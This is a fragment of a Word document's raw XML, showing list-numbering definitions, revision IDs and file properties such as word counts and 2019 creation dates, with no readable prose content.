      <w:lvl w:ilvl="1">
        <w:numFmt w:val="decimal"/>
        <w:lvlText w:val="%2."/>
        <w:lvlJc w:val="left"/>
      </w:lvl>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="1">
      <w:lvl w:ilvl="1">
        <w:numFmt w:val="decimal"/>
        <w:lvlText w:val="%2."/>
        <w:lvlJc w:val="left"/>
      </w:lvl>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11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0E"/>
    <w:rsid w:val="003B519C"/>
    <w:rsid w:val="00C2480E"/>
    <w:rsid w:val="00C3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AEC83-15D4-40BC-BB82-B8230BD9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04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5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97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89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8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43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05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16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53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52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6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85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59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1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0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63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01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6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21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3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59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6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3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94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1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70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41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52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70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2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3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52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9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47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91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4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31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3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8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5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0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0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65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26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90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6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30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7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08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189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6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71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1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7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75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87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83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50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67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49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65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44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20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90834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2608</Words>
  <Characters>14872</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>123</Lines>
  <Paragraphs>34</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Microsoft</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>17446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2019-10-24T05:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-24T05:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>